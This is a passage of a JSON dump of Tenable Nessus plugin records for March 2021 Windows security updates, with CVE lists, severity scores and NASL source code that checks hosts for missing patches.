(CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26882, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000853-security-only-update-8dac9fb9-dbc9-4484-8e56-df5492d20808\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?be16b68e\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000848-monthly-rollup-52f23db9-e1b0-4829-81b9-198fc82891a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ff1e9b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5000853 or Cumulative Update KB5000848.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000848',\n '5000853'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000848, 5000853])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-25T20:32:46", "description": "The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26881, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000803: Windows Security Update (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26886", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000803.NASL", "href": "https://www.tenable.com/plugins/nessus/147222", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147222);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\"\n );\n script_xref(name:\"MSKB\", value:\"5000803\");\n script_xref(name:\"MSFT\", value:\"MS21-5000803\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000803: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000803.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26864,\n CVE-2021-26865, CVE-2021-26866, CVE-2021-26868,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26891, CVE-2021-26898, CVE-2021-26899,\n CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26877, CVE-2021-26881, CVE-2021-26893,\n CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000803-os-build-14393-4283-711d10dd-adcb-490b-a640-aaa25009cfed\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8ea83\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000803.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000803'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000803])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T15:02:25", "description": "The remote Windows host is missing security update 5000809.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095, CVE-2021-26862, CVE-2021-26863, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26876, CVE-2021-26881, CVE-2021-27085)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000809: Windows 10 Version 1803 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26866", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000809.NASL", "href": "https://www.tenable.com/plugins/nessus/147224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147224);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000809\");\n script_xref(name:\"MSFT\", value:\"MS21-5000809\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000809: Windows 10 Version 1803 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000809.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26862, CVE-2021-26863, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26871,\n CVE-2021-26872, CVE-2021-26873, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26885, CVE-2021-26889, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26881, CVE-2021-27085)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000809-os-build-17134-2087-2601a686-8e12-449d-913c-a63a9b73e2eb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4ef7d4b2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000809.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-27085\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-26881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000809'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000809])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-13T15:09:22", "description": "The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090, CVE-2021-24095, CVE-2021-26860, CVE-2021-26862, CVE-2021-26863, CVE-2021-26864, CVE-2021-26865, CVE-2021-26866, CVE-2021-26868, CVE-2021-26870, CVE-2021-26871, CVE-2021-26872, CVE-2021-26873, CVE-2021-26874, CVE-2021-26875, CVE-2021-26878, CVE-2021-26880, CVE-2021-26882, CVE-2021-26885, CVE-2021-26889, CVE-2021-26891, CVE-2021-26898, CVE-2021-26899, CVE-2021-26900, CVE-2021-26901, CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107, CVE-2021-26869, CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26867, CVE-2021-26876, CVE-2021-26881, CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26879, CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-26892)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000802: Windows Security Update (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-1729", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-27070", "CVE-2021-27077", "CVE-2021-27085"], "modified": "2022-05-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000802.NASL", "href": "https://www.tenable.com/plugins/nessus/147226", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147226);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/10\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27070\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000802\");\n script_xref(name:\"MSFT\", value:\"MS21-5000802\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5000802: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) 